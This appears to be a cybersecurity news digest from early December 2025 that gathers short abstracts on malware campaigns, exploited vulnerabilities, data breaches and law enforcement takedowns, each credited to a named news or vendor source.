GoldFactory Hits Southeast Asia with Modified Banking Apps Driving 11,000+ Infections Full Text
Abstract
GoldFactory, a financially motivated cybercriminal group, has launched a new wave of attacks in Southeast Asia, targeting mobile users in Indonesia, Thailand, and Vietnam. The group uses modified banking apps to distribute Android malware.The Hacker News
December 5, 2025 – Vulnerabilities
Threat Signal Report Full Text
Abstract
A critical pre-authentication RCE bug has been identified in Oracle Identity Manager’s REST WebServices. This vulnerability allows unauthenticated attackers to exploit URI and matrix parameter parsing weaknesses to execute arbitrary code.Fortinet
December 4, 2025 – Criminals
Massive gambling network doubles as hidden C2 and anonymity infrastructure, researchers say Full Text
Abstract
A massive network, active for over 14 years, is being used for illegal online gambling and malware distribution, doubling as a command and control (C2) and anonymity infrastructure. Help Net Security
December 4, 2025 – Government
CISA Adds Two Known Exploited Vulnerabilities to Catalog Full Text
Abstract
CISA has added two new bugs to its KEV Catalog: CVE-2025-48572, an Android Framework privilege escalation vulnerability, and CVE-2025-48633, an Android Framework information disclosure vulnerability. CISA
December 4, 2025 – Botnet
Aisuru botnet behind new record-breaking 29.7 Tbps DDoS attack Full Text
Abstract
The Aisuru botnet has launched over 1,300 DDoS attacks in just three months, with Cloudflare mitigating 2,867 attacks since the beginning of the year. The botnet's most significant attack peaked at 29.7 Tbps, setting a new record. Bleeping Computer
December 4, 2025 – Attack
How attackers use real IT tools to take over your computer Full Text
Abstract
A new wave of cyberattacks is exploiting legitimate Remote Monitoring and Management (RMM) tools such as LogMeIn Resolve and PDQ Connect. Attackers trick users into installing these tools under false pretenses. Malwarebytes
December 4, 2025 – Malware
Sha1-Hulud: The Second Coming of The New npm GitHub Worm Full Text
Abstract
Sha1-Hulud has resurfaced with a new campaign targeting npm packages, affecting thousands of code repositories. This malware compromises development environments by trojanizing npm packages. Trustwave
December 4, 2025 – Vulnerabilities
Microsoft “mitigates” Windows LNK flaw exploited as zero-day Full Text
Abstract
A high-severity Windows LNK vulnerability, tracked as CVE-2025-9491, has been exploited by multiple state-backed and cybercrime groups in zero-day attacks. This flaw allows attackers to hide malicious commands within Windows LNK files. Bleeping Computer
December 3, 2025 – Attack
Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp Full Text
Abstract
The Water Saci campaign in Brazil leverages AI-enhanced, multi-format attacks via WhatsApp, utilizing a layered infection chain with various file formats and scripting languages. Trend Micro
December 3, 2025 – Breach
Ransomware gang demands sheriff of Cleveland County, OK pay almost $800,000 in one week Full Text
Abstract
The Cleveland County Sheriff's Office in Oklahoma has been targeted by the Rhysida ransomware group, which is demanding a ransom of 9 bitcoin (approximately $787,000). The attack was disclosed on November 20, 2025. Comparitech
December 3, 2025 – Breach
Shai-Hulud 2.0 NPM malware attack exposed up to 400,000 dev secrets Full Text
Abstract
The Shai-Hulud 2.0 malware attack has compromised over 800 NPM packages, exposing up to 400,000 developer secrets. This attack has significant implications for software supply chain security. Bleeping Computer
December 3, 2025 – Vulnerabilities
Vulnerability & Patch Roundup — November 2025 Full Text
Abstract
This advisory provides a detailed overview of critical and high-risk vulnerabilities identified in various WordPress plugins and themes for November 2025. These vulnerabilities pose significant security risks. Sucuri
December 3, 2025
DOJ takes down Myanmar scam center website spoofing TickMill trading platform Full Text
Abstract
The DOJ has successfully dismantled a fraudulent website spoofing the TickMill trading platform, operated by a scam center in Myanmar. The Scam Center Strike Force tracked the fake website back to the Tai Chang scam compound in Kyaukhat, Myanmar. The Record
December 2, 2025 – Malware
ShadyPanda browser extensions amass 4.3M installs in malicious campaign Full Text
Abstract
The "ShadyPanda" campaign is a long-running malware operation involving browser extensions that have amassed over 4.3 million installations. The extensions were initially submitted in 2018; the first signs of malicious activity were observed in 2023. Bleeping Computer
December 2, 2025 – Breach
SmartTube YouTube app for Android TV breached to push malicious update Full Text
Abstract
The SmartTube YouTube app for Android TV has been compromised, leading to a malicious update being pushed to users. The breach involved the compromise of the developer's signing keys, affecting version 30.51 of the app. Bleeping Computer
December 2, 2025 – Malware
Glassworm malware returns in third wave of malicious VS Code packages Full Text
Abstract
The Glassworm malware has resurfaced in its third wave, targeting developers using VS Code-compatible editors. This campaign introduces 24 new malicious packages on the OpenVSX and Microsoft Visual Studio marketplaces. Bleeping Computer
December 2, 2025 – Criminals
Officials accuse North Korea’s Lazarus of $30 million theft from crypto exchange Full Text
Abstract
A recent cyberattack on South Korea's largest cryptocurrency exchange, Upbit, resulted in the theft of $30 million. The attack is attributed to North Korea's Lazarus Group. The Record
December 2, 2025 – Vulnerabilities
Google addresses 107 Android vulnerabilities, including two zero-days Full Text
Abstract
Google's December security update for Android addresses 107 vulnerabilities, including two high-severity zero-day vulnerabilities, CVE-2025-48633 and CVE-2025-48572. This update marks the second-highest number of vulnerabilities patched this year. CyberScoop
December 2, 2025 – Vulnerabilities
Full Disclosure: [REVIVE-SA-2025-005] Revive Adserver Vulnerability Full Text
Abstract
A vulnerability in Revive Adserver, identified as CVE-2025-55129, has been reported. This vulnerability involves an incomplete list of disallowed inputs, allowing for potential impersonation attacks. SecLists
December 1, 2025 – Criminals
Police takes down Cryptomixer cryptocurrency mixing service Full Text
Abstract
Law enforcement agencies in Switzerland and Germany have successfully dismantled the Cryptomixer cryptocurrency mixing service. This operation, known as "Operation Olympia," resulted in the seizure of €24 million in Bitcoin. Bleeping Computer
December 1, 2025 – Breach
South Korea’s Coupang Hit by Massive Data Breach Affecting Nearly 34 Million Customers Full Text
Abstract
Coupang, a leading South Korean e-commerce platform, has experienced a massive data breach affecting nearly 34 million customers. This incident is one of the largest cybersecurity breaches in South Korea in recent years. The Cyber Express
December 1, 2025 – Government
CISA Adds Actively Exploited XSS Bug CVE-2021-26829 in OpenPLC ScadaBR to KEV Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a cross-site scripting (XSS) vulnerability, CVE-2021-26829, in OpenPLC ScadaBR to its Known Exploited Vulnerabilities (KEV) catalog. The Hacker News
December 1, 2025 – Breach
Brsk confirms breach as bidding begins for 230K+ records Full Text
Abstract
British telco Brsk has confirmed a data breach involving unauthorized access to its customer database, affecting over 230,000 records. The stolen data includes customer names, email and home addresses, phone numbers, and installation details. The Register